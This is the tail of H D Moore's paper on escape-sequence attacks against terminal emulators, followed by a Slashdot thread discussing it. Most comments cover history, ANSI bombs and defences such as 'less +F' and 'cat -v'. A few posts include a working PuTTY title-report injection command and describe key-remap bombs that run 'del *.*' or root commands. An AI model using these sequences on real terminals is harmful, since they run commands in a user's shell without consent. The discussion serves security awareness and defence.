--- http://www.attrition.org/security/advisory/ADM/adm .evil.esc.advisory

AmigaOS Escape Sequence Exploits
--- http://www.abraxis.co.uk/SA-2001-11-08.html

MS-DOS/Windows Key Redefinition
--- http://lists.insecure.org/lists/bugtraq/1994/Jul/0 029.html

Multiple Emulator Window Resize DoS
--- http://archives.neohapsis.com/archives/bugtraq/200 0-05/0409.html
--- http://groups.google.com/groups?selm=E12zFeu-00075 I-00%40ixion

The Original "Flash"
--- http://www.parallaxresearch.com/files/unix/exploit s/flash.c
--- http://groups.google.com/groups?selm=342k7c%243ne% 40news.ysu.edu
--- http://www.phrack-dont-give-a-shit-about-dmca.org/ show.php?p=47&a=4

[ Credits ]

This paper was written by H D Moore, with much help from the rest of the Digital
Defense Operations Team. I would like to thank Solar Designer for providing some great
feedback on the original draft and Mark Cox for handling the CVE candidate generation
and vendor coordination.

Re:In case of slashdotting...

[Hanji]

It's a text file on what appears to be a decent server, not some Joe Q. User's geocities account, discussing a topic of relatively low interest to most people.

In other words, it's not going to get slashdotted, so stop karma whoring.

Re:In case of slashdotting...

[Coke+in+a+Can]

You'd be suprised how easily a site can go down.

(Yes, it is karma whoring, but after all the shit this site has given me, I think I deserve some karma. Did you know that I sacrificed my connection to mirror the Starship Exeter vids? That site went DOWN. I mean DOWN. My mirror was actually useful. I was listed as a mirror by the Exeter guys. Did I get ANY karma? No.)

Re:In case of slashdotting...

karma whore...next time you do something like this, post as AC...

Re:In case of slashdotting...

boo-fuckin-hoo!

Re:In case of slashdotting...

[Coke+in+a+Can]

I would, but as I said before, I'm pissed after sacrificing my connection (mirroring Starship Exeter), and not getting ANY thanks. My ping went from 50 to 900. My DSL felt like dialup.

Some karma would have been nice, but nooooo. Just kill my connection and leave. Freaking leeches.

Re:In case of slashdotting...

[Coke+in+a+Can]

Fine. Let's /. YOU and make YOUR DSL connection feel like 56k, see how THAT feels.

Re:In case of slashdotting...

What did you think was going to happen? That 1 or 2 people would download something from you (throttled)? You made your choice. Quit whining. At least you didn't have to pay high bandwidth server charges. Geez.

Re:In case of slashdotting...

[Coke+in+a+Can]

I was expecting that I would get a bit of thanks, maybe some karma. It'd be fine if someone thanked me. Fucking ungrateful leeches.

Re:In case of slashdotting...

You sir, are a total idiot moron jerk LOSER.

Re:In case of slashdotting...

Post it anonymously next time. You won't get flamed for being the whore you are.

Re:In case of slashdotting...

Are you kidding? He does this just so that he can whine.

Re:In case of slashdotting...

I miss those old page-widening posts. It's a real shame that so much of Slashdot history is gone now. These new kids don't know th' pain of seeing your browser window become 1000 pixels wide.

Re:In case of slashdotting...

This is the funniest fucking thread!

Re:In case of slashdotting...

Your mom is the funniest fucking thread.

Re:TXT?

[chrisseaton]

People would know what I mean't if I wrote in l33t, but it would be a stupid thing to do.

DAMN, THIS iS SERIOUS!!!

Eh? Who gives a damn!!!!

Re:TXT?

[thebatlab]

So if it was in HTML the link should have been "the paper (HyperText Markup Language)..."?

Come on, is it that big of a deal really?

Re:TXT?

[jmays]

Perhaps ;) I think TXT is more widely understood to the common person then l33t, though. An abbreviation that is 3/4 of the original word isn't very useful though ... I will concede that.

Reinventing

[Sarcazmo]

So they discovered ANSI bombs over again.

Simple! Just tell Linux not to load ANSI.SYS, problem solved!

Re:Reinventing

[xchino]

Those were fun... remapping all keys to delete fun files, and then mapping the backspace key as enter :)

Worked quite often...

Re:Reinventing

[thogard]

Yep, the new security guys love to refind whats already out there. In this case, most likly out there in google groups' archive.

One thing they forgot about was the enter key mapping which can be loads of fun as well as the function key mapping. Most of the v100ish things will allow you to reprogram the enter key to any 4 character sequence (4 nulls is fun) but many of the people who copied the spec, didn't bother with the 4 character limit.

Talk is cheap.

[FreeLinux]

Another day, another vulnerability. These exploits are getting more bizzare and more useless every day. The risk factor here is ridiculously low.

I don't want to here about anymore useless exploits or no risk vulnerabilities. If you really want my window title, I'll telll you what it is; Getting Hacked Through Your Terminal - Konqueror

Now, when someone gets an exploit to replace the Slashdot ads with Goatse, then I'll be impressed.

Re:Talk is cheap.

[kasperd]

If you really want my window title

You got it all wrong. Nobody wants to know what your window title is. However somebody wants to decide what your window title is going to become, and later they are going to have your shell execute that as if it were a command.

Re:Talk is cheap.

[dhammabum]

This is hardly useless or risk-free. It would be quite easy to create a worm to pump arbitrary escape/binary code into syslogs and apache error logs around the world.

If you had read the article the author gave quite a convincing hack sequence.

Re:Talk is cheap.

[bumby]

>I don't want to here about anymore useless exploits or no risk vulnerabilities. If you really want my window title, I'll telll you what it is; Getting Hacked Through Your Terminal - Konqueror

Aha, he's running Konqueror, hence kde *searches for kde-exploits on scriptkiddieheaven.com*

Mohahaha *rubbing his hands with a evil grin on his lips*

Re:Talk is cheap.

[KainX]

Convincing, perhaps, but also misleading. Please see my comments here: http://slashdot.org/comments.pl?sid=55578&cid=5415 971

Re:Talk is cheap.

[dotgain]

Ah, matey I think, for your own good you should RTFA. After you do, you'll be enlightened and may even realise your system is vulnerable! Anyway, for a sneak peek, the exercise is not finding out your window title, quite the opposite. It's about exploiting your terminal to change the title, then use another exploit to copy the title to your command buffer. What I'm doing here might be called Karma whoring, so I'll leave the rest to your imagination and again encourage you to read up.

Oh, and I don't believe this has been said today yet: All your 25th line are belong to us!

Re:Talk is cheap.

well, goatse is, a kind of a window hack

Fuzzy memory

[maelstrom]

Been a long time, but I seem to recall that many popular bulletin board systems used special ANSI characters as control codes in the menus and such. The purpose was to allow the sysop the ability to dynamically add the current date, or who was online, etc. Basically server side includes for the BBS.

However, certan software would allow an attacker to insert these control codes anywhere, and not just interpret them from the menus.

Imagine the hilarity that insues once the attacker figures out the embed sequence for the drop to DOS feature. :)

Re:Fuzzy memory

[zztzed]

Wow, your memory really is fuzzy... either that or you used incredibly badly-written BBS software.

No BBS program I ever used (most of my experience is with TriBBS and RemoteAccess, but I also dabbled with Renegade and various Renegade-alikes) would parse the dynamic-content codes outside of files that would actually be displayed by the BBS. My memory's a bit fuzzy as well, so there might have been a few exceptions that I don't explicitly recall, such as allowing users with high enough access levels (e.g., sysops) to use them in messages, or allowing them in certain message bases, but under normal circumstances no one but the sysop would be allowed to use them and even then only in very limited circumstances.

Similarly, no BBS program I ever used had a "drop to DOS" sequence that could be embedded in a display file. Of course there was a menu command that would do it, but a) menus and the ANSI files displayed when users accessed them were always separate and b) the drop to DOS command would have to be explicitly defined in whatever menu for anyone to actually use it, and only insane sysops would allow a regular user access to it.

Re:Fuzzy memory

[maelstrom]

Could be, most of my experience as a Sysop was with RemoteAccess 2.02, Frontdoor 2.12, and various Renegade and WWIV boards.

And yes, it would be incredibly poor programming practice to have a code path that would allow a user to exploit this. But, consider that many boards had some kind of dynamic headers which would display on top of the regular menus or message boards.

So it could have been possible such that a user could embed a sequence in a forum message and then upon display the stupid software loads the header from disk, appends the part it has to display and then parses it for command sequences and finally displays it.

Perhaps I'm only remembering somone claiming this was possible, I never tried to exploit any BBS, I was on the other side trying to keep myself up to date so these things couldn't happen to me. Either way, it was a blast being a Sysop and its good to see I'm not the only one on Slashdot that got a start there :)

Re:Fuzzy memory

In early version (More info can be found here

So this means...

[jeanluisdesjardins]

that if you watch your tail you wont get hacked...

(or at least you will know when you are getting hacked...)

i am chrisd

This isn't a big problem.

[Dthoma]

Someone has to be using a terminal for someone to be able to do this to them. Is it just me, or is the solution really obvious? Just chmod every thing with a command line to 000! That should keep those naughty, naughty crackers out!

Re:This isn't a big problem.

[antar]

Exactly, that's the way to do it! Another solution like this one that always works for me: shutdown -h now -- that should keep 'em out!

Mac OSX

[fafaforza]

Apparently the OSX terminal might be susceptible to this. It is possible to alias different escape sequences to commands like lm and ll to make the terminal full screen, send it to the background, make it tall, etc.

It would be interesting to see whether actual commands can be executed if tailing /var/log/messages, but I won't be the one to find out as my PowerBook is in the shop...

Re:Mac OSX

[scrod]

The OS X Terminal doesn't seem to be vulnerable. I just tried it.

Re:Mac OSX

[scrod]

Er, so someone who uses Windows, for example, would know more about the OS X Terminal than a Mac user? Jesus fuck, you're one of the stupidest trolls I've seen in a while.

Re:Mac OSX

[Waffle+Iron]

It is possible to alias different escape sequences to commands like lm and ll to make the terminal full screen, send it to the background, make it tall, etc.

The bad news: Evil black hat hackers can use remote exploits to move the OSX terminal around the screen.

The good news: With the velvet smooth animated motion, harmonizing colors, translucent effects and drop shadows, being 0wned has never looked better!

BBS ANSI Bombs

[Leeji]

Back in the day, "Ansi Bombs" were considered an art form. With the art scene so active, you could usually embed some evil escape string in a good looking graphic and know that you were going to get people.

The problem was DOS' overly-powerful ANSI.SYS interpreter. It let you remap any key to an arbitrary set of keys, making keyboard macros pretty easy. However, it also let evildoers remap "Space" to, for example, "del *.*, enter, y, enter." Luckily, there were third party ANSI interpreters that didn't suffer this vulnerability.

One time, when I was about to reformat my HD, I even wrote an ANSI bomb to do it. Crazy stuff. There's an interesting (and of course, old) paper about it here.

Re:BBS ANSI Bombs

[rjamestaylor]

Speaking of the BBS days, when using my Mac Classic and the terminal software of the day (the name of which I forget) whenever the string
NO CARRIER+++ was displayed beginning in position 0 (left to right) the modem connection dropped. I made the mistake of sharing this newfound knowledge with my friends who proceeded to disconnect me at every possible opportunity. Of course, today I could have them arrested under the anti-terrorism laws for their purposeful denial of service attack. Hmmm...is the law retroactive??

Re:BBS ANSI Bombs

[MikeFM]

I remember users of my BBS and MUD's that'd do that to each other. None of the term programs I used was ever affected but it was pretty sloppy coding not to think of people doing that. On the other hand you rarely see much done with term programs these days. Back then you'd frequently create fairly impressive interactive programs. It's just not something you see much any more. My favorite was when RIPTerm came out. I actually had some RIPTerm-based websites that'd only work if you were using a text-based web browser (like Lynx) and the RIPTerm client. Was sort of fun and predated Flash by quite some time. :)

PuTTy

[Dark+Lord+Seth]

seth@Discordia:~$ echo -e "\e]2;;echo This is to see how queer putty is\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"
Press Enter>;
seth@Discordia:~$ l;echo This is to see how queer putty is

I dare to say that putty IS vulnerable. This is what happens when I run a similiar command. Sure, it still expects an enter and anyone who takes his time to read stuff on his/her screen before blatantly hitting enter will notice the command. This was done with the latest build which I just downloaded from the site.

Re:PuTTy

[julesh]

Hmmm...

vengeance:/var/spool/mail# echo -e "\e]2;;echo This is to see how queer putty is\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"
Press Enter>;
vengeance:/var/spool/mail#

And that's with quite an old version (dev snapshot 2001-03-29 in fact). Maybe the vulnerability was only introduced recently?

Just looked through the CVS logs - looks like it was introduced on Sun Nov 25 15:21:25 2001 UTC (terminal.c, revision 1.90).

Uhm, no...

[loucura!]

If you had read the article, rather than just glancing through it... those were the terminal emulators he used.

Eterm was affected, Putty, Xterm, and Rxvt.

Also known as the "ANSI standard trojan horse."

[Ungrounded+Lightning]

So they discovered ANSI bombs over again.

Looks like it.

I recall the "ANSI Standard Trojan Horse" (though it was misnamed). It became quite common after ANSI standardized a cross between the VT100 and Ann Arbor Terminals escape sequences.

Simplest form was to send a "talk" mesage to a root user containing an escape sequence that programmed a hotkey with your command-to-be-run-as-root and then "hit the key" by remote control. (You could even bury it invisibly in an otherwise innocuous-looking message.)

ANCIENT stuff. What-early '70s?

Re: Can't read, can you?

[ Disclaimer ]

There is nothing new in this paper. The entire concept of exploiting a terminal by
supplying hostile input has been around for over 10 years now. Unix veterans and BBS
users have been exposed to this type of problem since the very beginning, a newsgroup
search can turn up all sorts of exploits, from the ever-popular "flash" program to the
abuse of logging features in xterm which were disabled in R5. Therefore the purpose of
this paper is to identify weaknesses in the current suite of popular terminal emulation
software, not to rehash an ancient problem.

-EOF-

What is more sad, you acknowledge this like it is a new vulnerability in your post.. when it clearly states, it's over 12 years old.. Feel like a new kid on the block don't you?

This isn't that much of a problem.

[$$$$$$$$$$$exy+Goats]

Most terminals released in the last few months aren't afflicted by this, particularly the most common. You have to be running a terminal to get hacked like this. You need some pretty contrived circumstances to get hacked like this; your average opportunistic script kiddie won't be able to use this trick too easily on strangers. Besides, couldn't you just set up a cron job to pipe all the logs through strings?

Re:TXT?

[spinlocked]

In my neck of the woods TXT is practically synonymous with text messaging. No, actually it's, synonymous with the delivery of TXT msg svrl hrs aftr u snt thm...

Thread

[taviso]

The author went on to have an interesting converstaion with Micahel Jennings, author of Eterm on Bugtraq here.

Re:Thread

[Bronster]

I'm very impressed with the intelligent and humble discussion that is in that thread. They really are both trying to work out how to avoid the problem without breaking applications, rather than blamestorming or pretending it's not an issue.

Michael Jenning's comments that he's not an expert on security, but does try his best show a real sense of humour and concern for his users.

Ok, so I'm being a bit of a fanboy, but most links to discussions between open-source developers I see these days are the fights they have (on the very public mailing lists where we can see them). We tend to forget the good work they do the rest of the time.

(raises hat, or would if I was wearing one) ... and glad I use konsole, at least until a bug is found there ;)

Re:Thread

[KainX]

Thanks. :)

I started out my life on Unix as a sysadmin, and I always found it distasteful how software developers would get all pissed off at the people who reported the vulnerabilities, as if they were somehow to blame for the author's own screw-ups.

The bottom line is simply that the person who wrote the code is responsible for their own mistakes. That's really where the buck stops.

In the end, all that really matters is that things get fixed as quickly and correctly as possible for the sake of the users. Ego-sparring and public feuds accomplish nothing and are ultimately counterproductive.

CORRECTION to terminal emulators not susceptible

[chongo]

Sorry .. I made a BAD cut and paste on my original posting! SORRY!!!

The following terminal emulators were found, according to the article, to NOT be susceptible to screen dump or window title attacks:

• aterm: 0.42
• konsole: 3.1.0 rc5
• gnome-terminal: 2.0.2 (libzvt 2.0.1) [2.2 indirectly]
• SecureCRT: 3.4.6
• aterm: 0.42

Some asked about my Perl filter for tailing log files.

Sans typos, here is an example that removes certain types of messages and fields, checks the file every 60 seconds, picks up trailing on the new file when the log file gets rotated (moved away), trims to 224 characters and replaces unusual chars with ~'s (assuming you use ASCII).

/usr/bin/tail --retry --follow=name --max-unchanged-stats=60 /var/www/logs/access_log |
/usr/bin/perl -ne '
$line = $_;
chomp $line;
next if $line =~ m{... some regexp you want to ignore ...};
next if $line =~ m{... etc ...};
$line =~ s/... some field you want to ignore ...//;
$line =~ s/... some common phrase you want to ignore ...//;
$line =~ s/^(.{1,224}).*$/$1/;
$line =~ s/\t / /g;
$line =~ s/[^ -~]/~/g;
print "$line\n";'

As they say in perl, there is more than one way to do it. The above code fragment is just to give you the general idea.

Tailing logs...

[Urchlay]

The paper mentions injecting escape sequences into log files which are being tail -f'ed... and that there's nothing new about terminal exploits.

When I first heard about this (a couple of years back) I started using less +F for tailing logs. less will convert the escape character into the token ESC (in bold or inverse video), avoiding any escape-sequence exploits.. and also adds the benefits of being able to scroll back and search, which would make it worth using even if there were no such thing as a terminal exploit.

If you're going to leave it running for a long time, you might want to also look into the -b and -B options, to limit the amount of buffer space it will allocate: something like `less -b1024 -B +F /var/log/apache/common.log' would limit less to 1024K (1M) of buffer, which means old data will eventually be discarded, but keeps less from malloc'ing all your core. As always, Read The Fine Manual for details :)

I just checked: the `more' command on my Linux and Solaris boxen seems to pass escape sequences through, so you really do want `less' (or alias less=more, if you're used to typing `some_command|more'), not to mention `more' has no equivalent to `less +F' or `tail -f'.

Hope this helps someone...

Re:Tailing logs...

[Skater]

Yes, it does.

Thanks.
--RJ

Re:Tailing logs...

[sfe_software]

I just checked: the `more' command on my Linux and Solaris boxen seems to pass escape sequences through, so you really do want `less' (or alias less=more, if you're used to typing `some_command|more'), not to mention `more' has no equivalent to `less +F' or `tail -f'.

Actually that should be:

alias more=less

But otherwise, very helpful. I'd always been in the habit of using 'tail -f', even as root -- and personally I'll be using 'less +F' from now on.

Re:CORRECTION to terminal emulators not susceptibl

Why 224 characters? Is there some bug with long lines one needs to avoid?

Re: Can't read, can you?

[Moses+Lawn]

Well, the point of the article is to point out that, while the exploit has been around forever, it's still around, in new, supposedly state-of-the-art code (latest Enlightenment, etc.) It would be really nice if people understood this and took steps to make sure they were safe. It would be really nice if terminal emulator authors fixed these problems, or at least worked around them (config option to recognize escape sequences other than colors, perhaps).

One point that stood out at me is how many apps are vulnerable because they started with an insecure codebase. This is how exploits become common - one buggy piece of code spreads to a dozen others and never gets fixed in any of them, if only because authors say "let's add our new features instead of validating these 25,000 lines of code we started with."

Re: why 224 character trim?

[chongo]

My terminal emulator windows happen to use a font that, on my monitor, permits a window of width of 225 characters.

By trimming down to 224 characters, I avoid line wrap. System crackers cannot cause a very long line to wrap at just the right place to fake another entry.

Sure, I'll perhaps miss important text beyond the 225th char, but I'm willing to take that risk. Besides, the script converts tabs to a single space and removes some common fields and phrases which further cut down down on long lines. And I can always to back to the logs to look at really long lines if I want to.

And yes, maybe some terminal emulator has some long line bug somewhere. My perl script helps avoid testing it. :-)

Re:CORRECTION to terminal emulators not susceptibl

Here's the way a REAL perl coder would write it:

(snipped) | /usr/bin/perl -ne '
next if /..some regexp to ignore/;
next if /..again../;
s/..field to ignore..//;
s/..phrase to ignore..//;
etc etc
print;'

None of this crappy $line business is needed. especially not for a "one-liner"...

Re:CORRECTION to terminal emulators not susceptibl

Hey troll: TIMTOWTDI (There Is More Than One Way To Do It --- in case you don't know the Perl motto).

Besides Troll, I think the poster said that the fragment was to give people the general idea, not to show them how to do it in as few chacters as possible.

Unstable xterm

[kasperd]

Some years ago I managed to make an xterm dump core simply by typing the contents of a binary file, which did not contain any malicious data, it just be coincidence contained a byte sequence that would cause xterm to dump core. Investigating this I found, that some sequence of 24 bytes was responsible. But if I made the xterm window larger, it would not crash from this sequence, however it turned out the original file contained another longer sequence that could also make a larger xterm dump core. I never actually understood exactly what was going on, but I found that later xterm versions does not crash from the sequences I saved from back then.

Re:Unstable xterm

[NewWazoo]

I'm feeling artistic, so I'll write.

This, in a nutshell, is why you'll never be a Great Hacker. I'm most likely projecting my own insecurities upon you, but I'm writing and you're not, so there.

I tend to notice little things like you noticed - that catting a binary file will crash my terminal. And then in a fit of boredom, I might even do as you've done and start trimming away sections of the file to find the offending string. I might even write a one-liner that will parse through it for me, automating what would otherwise be a tedious task. I'll eventually end up with a file that is 23 bytes long, and when catted, crashes the terminal.

But I won't ever find out why. That file will remain a curiosity in my $HOME/misc/, to be pondered at until I find that it no longer crashes whatever terminal program I'm using. It might even remain for a while, until one day I have a directory purging session and delete it, wondering "What the hell is this?".

And that, in my opinion, is what separates Great Hackers from the myriad of wannabes. I'm definitely a wannabe. I'm proficient at everything I do, but I'll never spend the (quite possibly small number of) hours actually finding out why that string crashes xterm, and maybe doing something useful with it. The rewards are definitely there, and I've tasted their sweetness in flashes of inspiration, but I just don't have it.

What is it? I don't know. I don't suspect that I ever will, in this particular field. I think that I might just have it in another field (racing cars), but I think it's likely that I'll be Just Proficient at that, too, much as I have been at most everything for my whole life. And that's a pretty depressing thought.

Great Hackers have it, I think. They must. In fact, part of me wants to disbelieve that it exists; that if I'd just push myself a little bit harder, that if I'd just concentrate a little more, that if I would simultaneously dig deeper into and maintain a broader view/mindset of whatever it is that I'm doing, that suddenly I'd become a Great Hacker. I'd know the formula of self-motivation, and from then on it'd be easy. But it just doesn't seem to work that way - I read the exploits of Great Hackers, and marvel at how they do their work, just knowing that I could never do that! Knowing that given the same set of curiosities, my interest or drive or whatever would sputter out, and at best I'd end up with something nifty, that I might be able to make use of in my next bout of Adequate Hacking.

I'm sitting here thinking that I want to type some sort of sage-like advice to you (whoever you are) about forcing yourself to go the extra mile, or don't be lazy, or to eat your Wheaties before you start hacking. Fact is, I know that I've missed the opportunity to grab it. I also know that I've no clue what I did "wrong", and wouldn't know what to do differently, even could I go back in time and change something. I wish that I could have it, but I know that I never will.

I'm still pretty young (19)... maybe I'll figure out how to grab it between here and there.

Re:Unstable xterm

[Ataeagina]

Well, I'm using xterm 4.2.0. (165), and it occasionally dumps core on some binary files I try to "cat" (by accident of course). Don't ask me which files, and what they contain. I really never gave it much thought.

Re:Unstable xterm

[josh+crawley]

>And that, in my opinion, is what separates Great Hackers from the myriad of
>wannabes. I'm definitely a wannabe.

No, sir. YOu are not a wannabe. Go check out usenet:alt.hacking.* and look for
"Hotmail Hax0rz", "Warez", "Mail haxorz", "DOS", and other usual keywords
associated to 'have-no-clue-but-must-impress-my-friends' wanabees. If you have a
clue, you're already out of that category.

>I'm proficient at everything I do, but I'll never spend the (quite possibly small
>number of) hours actually finding out why that string crashes xterm, and maybe
>doing something useful with it. The rewards are definitely there,

The big key there is "why". That's what gives master hackers their edge. The
thirst of knowledge hanging just above their head, waiting to be plucked. But
how do you pluck it? Do you just rush to it, squishing it in your hands, licking
the residue from your palm? No.. you cherish and understand it. But you don't
give up. If that means asking for help from somebody more learned in that
area... Anything to solve that problem.

>and I've tasted
>their sweetness in flashes of inspiration, but I just don't have it.

But you've never tasted the sweetness of power sitting at a console with remote
root, gotten accidently by noticing and exploiting a 'weird bug'?

>What is it? I don't know. I don't suspect that I ever will, in this particular
>field. I think that I might just have it in another field (racing cars), but I
>think it's likely that I'll be Just Proficient at that, too, much as I have
>been at most everything for my whole life. And that's a pretty depressing
>thought.

Oh, is it? Look at your skills as a stat with a library of different happenings.
Who else here, let alone else in the world has your exact skill set and
memories? Nobody.

And so what, you'll be 'just proficient' in computing. That's way above the
average. Many people have a hard time of understanding "double click" or basic
computer terms. Put together and exploit what you do know and become an expert
in your field of knowledge. That'll get you respect, and access to more
information.

Re:Unstable xterm

s/Great Hacker/Fucking Loser/g

Re: REAL perl coders

I happen to think that using the implied $_ variable looks crappy. Assigning $_ to a more explanatory variable seems very reasonable, particularly when you are trying to give someone an example.

But to each his/her own. TMTOWTDI (or TIMTOWTDI if you prefer) after all!

Re:CORRECTION to terminal emulators not susceptibl

You forgot the chomp, chump!

The preceding pipe command could terminate early, leaving the Perl program with a final line that is not newline terminated. So you cannot simply rely on the final s/^(.{1,224}).*$/$1/; print; to do the job. You need to chomp first, and print a newline after.

i n33d kewl ANSi, hook me up plz

Where can i get kewl 10-mile long old-school ANSI???

What is Jaguar susceptible to?

[dave1212]

Mac OS X 10.2.3, with X11, PHP, MySQL, Web Sharing, File Sharing, and FTP all running.

Dear Sir,

I have checked your journal, and there are no links to porn sites. Please rectify this immediately.

Thank you,
Anonymous Coward

tail -f log | cat -v

[e40]

will take care of the tail of a log file problem...

Re:tail -f log | cat -v

[Alain+Williams]

An easier way is to use 'less' - which filters out nasty characters. You hit 'F' and it acts like 'tail -f' with the nice bonus that you can hit '^c' if you see something and want to and go back up the file to see how it started.

It does help to reread the manuals occasionally.

Poking fun at Enlightenment?

[GrimReality]

In the article, especially in the 'Fictitious Case Study', the author makes quite a lot of snide (although funny) remarks about Enlightenment.

By the way, I am not an Enlightenment user, so don't think that is why posted this.

For instance...

...Jim has a new 2.5Ghz P4 and finally has enough processing power to run the Enlightenment window manager...

...or...

...Andre finally manages to get Eterm and its 60 megabytes [ sic] of support libraries compiled....

Thank you.

GrimReality
2003-03-02 01:27:02 UTC (2003-03-01 20:27:02 EST)

Re:Poking fun at Enlightenment?

[KainX]

They're obvious exaggerations for the intent of being humorous. No one should take them seriously or interpret them as anything other than playful jabs.

It's not that simple.

[blair1q]

How many of us happen to put pictures of our terminal windows up on our websites?

Re:It's not that simple.

y0 d00d, on my website i got mpegs of me reciting the root passwd of all my servers... coz everyone knows that security through obscurity is bad!

Re:It's not that simple.

[fucksl4shd0t]

How many of us happen to put pictures of our terminal windows up on our websites?

Gee, I wonder how many desktop themes I've looked at that say "Look how great a terminal window looks in this them!". I know for a fact that MPlayerhq has terminal windows in some screenshots.

Hm, I wonder how many of us don't put pictures of our terminal windows up on our websites? That's probly a smaller number than the one you're looking for....

The more things change... 1979 version

[billstewart]

"Hackers At Berkeley Find Security Hole in the Unix, a computer made by DEC". From the Oakland Tribune or some other Bay Area paper in spring 1979. Not an exact quote, but they did say the Unix was a computer made by DEC.

A long long time ago, on a uucp-net far, far, away, we didn't use terminal emulators, we used real hardware terminals. Most of them didn't run ANSI (I don't remember if the ANSI terminal standards were defined yet, but they looked very much like a DEC VT-100 terminal), but that meant there were lots of types of terminals, all trying to achieve market differentiation by having cool features or small size or large screens or cool plastic cases. Lots of different cool features means lots of vulnerabilities. The hackers in question had REDISCOVERED AN OLD TECHNIQUE - they found ways to hand escape sequences to VT100 terminals that would get the terminal to send arbitrary text back to the computer, which in those good old command-line days meant they could do anything they wanted. All you needed to do was email somebody a message with carefully crafted character strings in it, or use the talk program to write them to their terminal (back when everybody left their ttys writeable so talk would work.) Some of the popular techniques were to abuse programmable function keys (send a sequence to put some string in F1, then another sequence to auto-trigger the F1 key), or automatic whoami-responders (VT100 had one of these), or put the terminal into loopback testing mode (letting you type anything you want.)

The Hewlett-Packard HP2621 and its relatives had two easy things to do, which didn't let you send arbitrary characters but still hosed the user - one did a reboot on the terminal (and thereby dropped the connection), while the other put it into test pattern mode (sending a long string of UUUUUU to the computer.) There may have also been some block-mode things that let you send arbitrary characters to the computer, but these two were the easiest and best-documented. A couple years later, when I was a newbie learning Unix programming and security at Bell Labs, and Robert Morris Senior (father of RTM the Worm Author) was a department head for computer security (before he went to NSA), we'd had a discussion about some techniques I was trying (which he cracked through personally :-), and a few days later, when I'd patched those holes, I was playing rogue in the evening, and one of his people talked the test pattern sequence at me. For a few seconds, I though Umber Hulks were suddenly going to eat my character, but then realized I'd been hacked, and it was one of RTM's people following up on what I'd patched and what I hadn't...

Terminology note on "hacker" as opposed to "cracker" or "vandal" - The folks at Berkeley really were hacking - tinkering with things to find their limits - and while they could potentially use their knowledge for evil, they instead told people about it, which reminded lots of us to check for potential security holes in our systems.

The "it"

[pr0ntab]

The Great Hacker (later read: me) would dig up docs on VT10x escape sequence interpretation. Then I would look to see what that trimmed down file translates to in terms of screen manipulation code.

I would think to myself, does that series of actions even make sense? It probably wouldn't (seeing as it tends to crash xterm).

The next thing would be to trim the sequence down to just escape codes (removing any printable characters in the sequence), and see if still dumps core. If not, its probably due to a simple segfault (whether writing character or blitting a bitmapped font in an invalid buffer).

Then try removing an escape code or chaning a parameter. Does it still dump core? Are there ranges of values for each escape code that cause the behavior?

Finally, you'd grab the source code and see if the are any obvious flaws. Does the emulator load a parameter and then cast it into a signed value? Then does it not check to see if it was negative? etc.

All those steps (which I've never done nor considered before your post) would be my plan to handle and investigate the situation.

I think what it requires to be a Good Hacker, therefore, is a sick motivation to get to the bottom of things, no matter how painful or time consuming the excercise. The steps I outlined above could easily take 15 hrs. to adequately address. Are the potential results worth that time? To a great hacker, who relishes such experiences, yes they are, even if she cannot pinpoint the problem or fix it.

There was nothing that you did wrong. I think maybe you didn't really want to be one. Great hackers do not just have fits of ingenuity and shit. They just hack at things until it becomes clear. It's time consuming, tiring, and often thankless. But over time, you get to have a certain knack for relating new problems to old ones, and it becomes easier.

Nothing says you can't start now either. Go for it!

You fail on step 1

[mangu]

Reboot the computer, somehow.

What if the computer is like my own, where I have a BIOS password *and* a padlock locking the case?

Re:You fail on step 1

[Lemmeoutada+Collecti]

Well, since physical access is basically required, two words... 'Bolt Cutters'

Re:You fail on step 1

[reyalsnogard]

Reboot difficulty? Easy: power loss.

Happens all the time when we least suspect it (and aren't running a UPS). ;)

Re:You fail on step 1

For your computer, start like so

Step .2 - unplug computer
Step .4 - bolt cutters to lock
Step .6 - jumper or screwdriver to clear bios
Step .8 - plug computer back in

Re:You fail on step 1

> Well, since physical access is basically required, two words... 'Bolt Cutters'

OK...what about the other two words...'BIOS password'?

Re:TXT?

[uid8472]

And here I thought they were referring to RFC 1464: Using the Domain Name System To Store Arbitrary String Attributes....

Great Hackers

[Hubert_Shrump]

Larry Wall's famous quote says Great Hacker virtues include Laziness, Impatience, and Hubris.

I would agree, and say that a Great Hacker would locate those killer ctrl codes, get a boatload of diagnostic information together, and hand all that over to the maintainer of the terminal program and then not sweat trying to figure it out themselves.

Let someone that knows the code, and might be better able to divine what's up have a wonk at it. You could even check the diffs if it ever gets patched, and you were curious and had time to kill.

Then, the Great Hacker would go and patch their own project to fix up the newest incoming bug report.

Then, the Great Hacker would rest and eat of the Divine Pizza.

And all would profit.

Re:Great Hackers

[@madeus]

Damn :/

That's what I was trying to say, but shorter, and included the specifc Larry Wall reference I was thinking when I wrote my reply.

That will teach me to post a followup before reading the already posted replies. <autolart>

Re:Great Hackers

[Hubert_Shrump]

(sticks thumbs in suspenders)

No need to worry, we all talk out of turn here.

Hey wait, you've got a lower UID.

No, no excuse.

NO ONE CARES IF YOU ARE A GREAT HACKER

Shut up about it. Thanks.

"write"?

[kris]

You do have "mesg n" set, do you?

If not, you are attachable by "write " as well.

And yes, this is very, very old. Many an administrators open terminals have been taken remotely using this when I was at university.

Kristian

Obvious fix.

[blair1q]

tail -f /var/spool/foo/logfile | cat -uv

Something any smart sysadmin would do, anyway, to display just exactly what was showing up in the log.

Re:Obvious fix.

> tail -f /var/spool/foo/logfile | cat -uv

Well, at least in Debian Linux's cat manpage

-u (ignored)

What was -u supposed to do?

Re:Obvious fix.

[blair1q]

Huh.

Cygwin's manpage says it's ignored, too.

-u means "unbuffered". 'cat -v' would wait for newlines. I wonder how linux and cygwin get around the difference. Hopefully, by always being unbuffered.

Doesn't have to be a tail or log file.

[TheLink]

Some programs or setups spit stuff out to the console - warnings, error messages etc.

I remember doing something similar when testing my company's TIS FWTK setup years ago. When you used an address with unbalanced brackets, sendmail when called by smapd will grumble to the console. As a test I sent an email with a ESC sequence setting the foreground colour to black and it worked. Wasn't too surprised. Wasn't able to find an exploit for the console term at that time, and no one abused it (security through obscurity).

Later I switched to using qmail (IIRC qmail 1.0.3 dates to 1998, the TIS FWTK has been around for quite some time). Just to test things out I also recently wrote an smtp proxy to enforce state and filter out stuff(qmail may be robust, but it tends to pass the junk unfiltered to other stuff which may be less robust).

Some O/Ses send a many kinds of messages to the console too.

Forget about emulators, just hack real terminals

[iamacat]

